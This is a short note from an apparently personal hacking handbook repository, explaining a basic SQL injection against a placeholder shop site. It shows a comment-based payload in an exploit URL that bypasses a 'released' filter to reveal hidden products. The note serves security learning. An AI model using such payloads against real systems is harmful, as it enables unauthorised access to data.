x/handbook
1
0
Fork 0
Code Issues Pull requests Actions Packages Projects Releases Wiki Activity
handbook/tools/3.Web-Hacking/4.Injection/SQL/Commands/SQL-injection/1 - Retrieving Hidden Data.md
Anton Nesterov af9011411c
vault backup: 2024-08-31 01:07:21
2024-08-31 01:07:22 +02:00

16 lines
435 B
Markdown
Raw Blame History

## Retrieving Hidden Data
Target URL: https://insecure-website.com/products?category=Gifts
```
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
```
Exploit URL: https://insecure-website.com/products?category=Gifts' --
```
SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1
```
- -- is a comment indicator in SQL
In Result, all produces are displayed -> including unreleased products
Reference in a new issue View git blame Copy permalink